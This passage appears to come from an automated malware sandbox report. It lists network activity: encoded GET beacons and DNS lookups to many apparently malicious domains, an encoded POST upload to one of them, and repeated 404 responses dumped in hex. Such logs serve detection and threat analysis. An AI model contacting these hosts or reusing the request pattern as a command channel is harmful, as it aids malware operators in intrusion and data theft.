            Source: global trafficHTTP traffic detected: GET /a8og/?EZ2lo=63Tp62CKGmWe748Q5xeLHwHqlS9/zq85FZX5ThSUZXnn1SRB3dZnoH27TzC6blggGQlMUKSAP7YLOcUQh9GTRQVuzTmijcvuIWv8RUIdN7d1j+xO0w==&7NP=7FXXUPl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kilbmn.xyzUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /zkan/?EZ2lo=6ZAT3xIn5pUb7db/tro8oHOZJyMtHS049C+OqD69Fiv/T4rqyATbhBxWGTJ8nzJFC6ZuCLeYMeRBfErXdr+6Npf/MiZpvdt0v4GFRoEaqN4q8s+9XQ==&7NP=7FXXUPl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.galaxyslot88rtp.latUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /vv4m/?7NP=7FXXUPl&EZ2lo=YHtjADYkxu7EjL2CugAOyFkd+FKjIe5l/QKXGaE9Itky6wrTEgv0uDMpgH/UthNzfFIQLoI7VSX8KaEEAmnqI9GcxpfDY6d99mE8V8mh5Ak2zhlphg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.chalet-tofane.netUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /avd1/?EZ2lo=NeMCgL3W9jbBcF5QBI+xC2/C0rmOR2XSlRqEEw8EMM6ZBEMSksCLPJavXevPRkfiV5XKnMhO9JLxspMiSypcmF8IFrr+/UGmTQZVyy/nwgawwG6yzQ==&7NP=7FXXUPl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.federall.storeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /gbk4/?EZ2lo=vkKyIW0tFglfe9bmeE+ByzsP8tU/YNgfJJINKebc7ayTo2CGj2Bmv1A0Nfus+XH8P5LArwMekXdWm5WC/1gWFlJYtj1QuGdjZIz6/BBdIThi9XPOug==&7NP=7FXXUPl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.mivasectomy.netUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /ztx6/?7NP=7FXXUPl&EZ2lo=LeaXBPgHi5cWzf7BLXmmPavQOKPWjuOHHJU4/JhL5/erYoJhFK0RVrM4N1v7oJ6CU0UsWYV2IqVksZKiICMv/g8AZCcinNpV5w5CDvgP9QHPdQNWgQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.animekuid.xyzUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /kpvx/?EZ2lo=qVlYuFMRm0T/H/1dN1vNUTygvewP5xPIMi2tCBBBqVz46ihG+FVn/BxKK2Kq0cGJXf1CUDwOjcd0Kop00bnWlMV60J7u8mOEgagA5oNjn1tN0dkAzg==&7NP=7FXXUPl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.nng65.topUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /vjif/?7NP=7FXXUPl&EZ2lo=hht6fXzVtrW5d+NPng+JG5iJCe7TavNe5+XwDzPis3heMTZrctTYWOKh4nmo+xDjprJSB+HPmC1WRNqnme2dwnVwPjNhKroV7fgYGIXE7NS2qGE/9Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.moritynomxd.xyzUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /1yii/?EZ2lo=S7820Y1cJZfxr22K40lVRI+qrmhalVt3Xj4gyHqd7MQTNmhmHaxoWGfNrnng7EIbxAFiJvsMf3T0ofXi1SEumpqeoP3XzrB7Dn3j9lk1UX6QYnk/Rw==&7NP=7FXXUPl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.albero-dveri.onlineUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
            Source: global trafficDNS traffic detected: DNS query: www.wearenotgoingback.info
            Source: global trafficDNS traffic detected: DNS query: www.030002304.xyz
            Source: global trafficDNS traffic detected: DNS query: www.kilbmn.xyz
            Source: global trafficDNS traffic detected: DNS query: www.galaxyslot88rtp.lat
            Source: global trafficDNS traffic detected: DNS query: www.chalet-tofane.net
            Source: global trafficDNS traffic detected: DNS query: www.kfowks.site
            Source: global trafficDNS traffic detected: DNS query: www.federall.store
            Source: global trafficDNS traffic detected: DNS query: www.mivasectomy.net
            Source: global trafficDNS traffic detected: DNS query: www.animekuid.xyz
            Source: global trafficDNS traffic detected: DNS query: www.nng65.top
            Source: global trafficDNS traffic detected: DNS query: www.moritynomxd.xyz
            Source: global trafficDNS traffic detected: DNS query: www.albero-dveri.online
            Source: global trafficDNS traffic detected: DNS query: www.platinumkitchens.info
            Source: unknownHTTP traffic detected: POST /u38h/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 194Cache-Control: no-cacheConnection: closeHost: www.030002304.xyzOrigin: http://www.030002304.xyzReferer: http://www.030002304.xyz/u38h/User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53Data Raw: 45 5a 32 6c 6f 3d 76 59 5a 6b 74 33 6a 65 70 4d 38 4b 70 47 61 63 77 78 76 50 6c 4d 6b 2f 53 37 6e 73 66 41 4d 52 6b 6b 38 55 33 54 76 50 76 6b 2b 6e 33 78 47 50 6a 4d 6d 48 31 47 32 4a 6d 33 2b 45 53 54 66 54 55 68 64 66 36 5a 41 79 73 2b 6d 6a 53 6a 41 35 32 69 57 4b 46 4e 2f 4d 44 42 4e 5a 5a 72 6c 54 64 33 73 75 6f 63 31 58 6f 66 59 5a 63 5a 7a 77 33 48 72 53 73 6e 72 70 31 33 2f 61 67 71 58 41 63 77 51 52 54 56 71 63 57 44 6a 45 67 52 75 6a 44 55 75 37 71 35 4d 6c 48 33 7a 42 48 59 43 55 48 56 6f 74 75 58 48 53 65 69 66 50 74 6b 4d 76 61 44 56 53 30 43 2f 4d 74 58 6e 30 Data Ascii: EZ2lo=vYZkt3jepM8KpGacwxvPlMk/S7nsfAMRkk8U3TvPvk+n3xGPjMmH1G2Jm3+ESTfTUhdf6ZAys+mjSjA52iWKFN/MDBNZZrlTd3suoc1XofYZcZzw3HrSsnrp13/agqXAcwQRTVqcWDjEgRujDUu7q5MlH3zBHYCUHVotuXHSeifPtkMvaDVS0C/MtXn0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 07 Oct 2024 08:38:40 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 07 Oct 2024 08:38:42 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 07 Oct 2024 08:38:45 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 07 Oct 2024 08:38:47 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 07 Oct 2024 08:38:47 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 